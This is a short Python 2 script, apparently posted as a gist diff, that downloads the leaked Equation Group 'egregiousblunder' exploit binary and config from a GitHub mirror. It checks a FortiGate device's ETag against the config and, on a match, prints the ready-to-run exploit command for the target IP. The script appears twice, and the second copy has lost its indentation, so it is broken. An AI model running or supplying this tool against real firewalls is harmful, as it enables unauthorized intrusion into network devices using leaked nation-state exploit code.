milo2012 · November 28, 2017 05:45
diff --git a/egblTest.py b/egblTest.py
 import requests, urllib, os, sys
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 requests.packages.urllib3.disable_warnings()

 #https://raw.githubusercontent.com/adamcaudill/EquationGroupLeak/master/Firewall/EXPLOITS/EGBL/EGBL.config

 headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0", 
 	"Accept-Encoding": "gzip, deflate",
 	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 	"Range": "bytes=0-18446744073709551615",
 	"Connection": "keep-alive"
 }
 lines=[]
 if not os.path.exists('egregiousblunder_3.0.0.1'):
 	testfile = urllib.URLopener()
 	testfile.retrieve("https://raw.githubusercontent.com/adamcaudill/EquationGroupLeak/master/Firewall/EXPLOITS/EGBL/egregiousblunder_3.0.0.1","egregiousblunder_3.0.0.1")
 if not os.path.exists('EGBL.config'):
 	testfile = urllib.URLopener()
 	testfile.retrieve("https://raw.githubusercontent.com/adamcaudill/EquationGroupLeak/master/Firewall/EXPLOITS/EGBL/EGBL.config","EGBL.config")

 with open('EGBL.config') as f:
    	lines = f.read().splitlines()

 if len(sys.argv)<2:
 	print "[*] Please enter the IP address of the FortiGate devices"
 	sys.exit()
 else:
 	url='https://'+sys.argv[1]
 	r = requests.get(url,headers=headers,verify=False)
 	eTag=r.headers['ETag']
 	found=False
 	for x in lines:
 		if eTag in x:
 			print "[+] Vulnerable to Egregious Blunder (EGBL) exploit"
 			cmd='LD_LIBRARY_PATH=/current/bin/lib ./egregiousblunder_3.0.0.1 -t '+sys.argv[1]+' -p 443 -l 1234 --ssl 1 -v --config ./EGBL.config --etag '+eTag+' --nopen'
 			print cmd
 			found=True
 	if found==False:
 		print "[*] https://"+sys.argv[1]+" is not vulnerable to EGBL"
	import requests, urllib, os, sys
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	requests.packages.urllib3.disable_warnings()

	#https://raw.githubusercontent.com/adamcaudill/EquationGroupLeak/master/Firewall/EXPLOITS/EGBL/EGBL.config

	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0",
	"Accept-Encoding": "gzip, deflate",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8",
	"Range": "bytes=0-18446744073709551615",
	"Connection": "keep-alive"
	}
	lines=[]
	if not os.path.exists('egregiousblunder_3.0.0.1'):
	testfile = urllib.URLopener()
	testfile.retrieve("https://raw.githubusercontent.com/adamcaudill/EquationGroupLeak/master/Firewall/EXPLOITS/EGBL/egregiousblunder_3.0.0.1","egregiousblunder_3.0.0.1")
	if not os.path.exists('EGBL.config'):
	testfile = urllib.URLopener()
	testfile.retrieve("https://raw.githubusercontent.com/adamcaudill/EquationGroupLeak/master/Firewall/EXPLOITS/EGBL/EGBL.config","EGBL.config")

	with open('EGBL.config') as f:
	lines = f.read().splitlines()

	if len(sys.argv)<2:
	print "[*] Please enter the IP address of the FortiGate devices"
	sys.exit()
	else:
	url='https://'+sys.argv[1]
	r = requests.get(url,headers=headers,verify=False)
	eTag=r.headers['ETag']
	found=False
	for x in lines:
	if eTag in x:
	print "[+] Vulnerable to Egregious Blunder (EGBL) exploit"
	cmd='LD_LIBRARY_PATH=/current/bin/lib ./egregiousblunder_3.0.0.1 -t '+sys.argv[1]+' -p 443 -l 1234 --ssl 1 -v --config ./EGBL.config --etag '+eTag+' --nopen'
	print cmd
	found=True
	if found==False:
	print "[*] https://"+sys.argv[1]+" is not vulnerable to EGBL"